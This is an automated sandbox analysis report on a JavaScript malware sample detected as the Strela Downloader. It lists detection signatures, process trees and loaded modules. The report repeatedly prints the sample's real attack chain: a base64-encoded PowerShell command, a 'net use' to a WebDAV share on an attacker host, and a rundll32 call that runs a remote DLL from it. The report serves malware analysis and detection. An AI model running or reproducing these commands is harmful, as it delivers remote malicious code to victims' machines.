Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
608017382513614877.js

Overview

General Information

Sample name:608017382513614877.js
Analysis ID:1545178
MD5:d8115aacb5152e72883e055d1ea57a4f
SHA1:a22d0ffe6a4e51c8a6896b6ab2d3d5e292c5be2c
SHA256:155bd815011e05b05929ebfb0d4ff38a8b9c3e54e4ab5f6fbcc242673cd06068
Tags:jsStrelaStealeruser-kupschke
Infos:

Detection

Strela Downloader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Encrypted powershell cmdline option found
JavaScript source code contains functionality to generate code involving a shell, file or stream
Opens network shares
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 5276 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\608017382513614877.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 1516 cmdline: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • rundll32.exe (PID: 6168 cmdline: "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\144472456913431.dll,Entry MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4220JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_4220.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\144472456913431.dll,Entry, CommandLine: "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\144472456913431.dll,Entry, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4220, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\144472456913431.dll,Entry, ProcessId: 6168, ProcessName: rundll32.exe
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\608017382513614877.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\608017382513614877.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\608017382513614877.js", ProcessId: 5276, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\608017382513614877.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5276, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, ProcessId: 4220, ProcessName: powershell.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\608017382513614877.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\608017382513614877.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\608017382513614877.js", ProcessId: 5276, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\608017382513614877.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5276, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, ProcessId: 4220, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4220, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\, ProcessId: 1516, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4220, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\, ProcessId: 1516, ProcessName: net.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Software Vulnerabilities

      barindex
      Source: 608017382513614877.jsArgument value : ['"WScript.Shell"', '"powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAA']Go to definition
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\System32\rundll32.exe
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: sentrypoints.com
      Source: powershell.exe, 00000002.00000002.1368167842.00000261BD2E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: net.exe, 00000004.00000002.1365358820.0000028E67250000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1364784710.0000028E6729B000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1364882970.0000028E67280000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1365439141.0000028E6729D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1365439141.0000028E67280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sentrypoints.com:8888/
      Source: net.exe, 00000004.00000002.1365439141.0000028E67280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sentrypoints.com:8888/R
      Source: net.exe, 00000004.00000003.1364882970.0000028E67280000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1365439141.0000028E67280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sentrypoints.com:8888/o
      Source: powershell.exe, 00000002.00000002.1368167842.00000261BD2FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1368167842.00000261BD33F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_4220.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4220, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==Jump to behavior
      Source: 608017382513614877.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal88.rans.spyw.expl.evad.winJS@8/3@1/0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2548:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivyjj3rw.lcs.ps1Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\144472456913431.dll,Entry
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\608017382513614877.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\144472456913431.dll,Entry
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\144472456913431.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: 608017382513614877.jsStatic file information: File size 1264705 > 1048576

      Data Obfuscation

      barindex
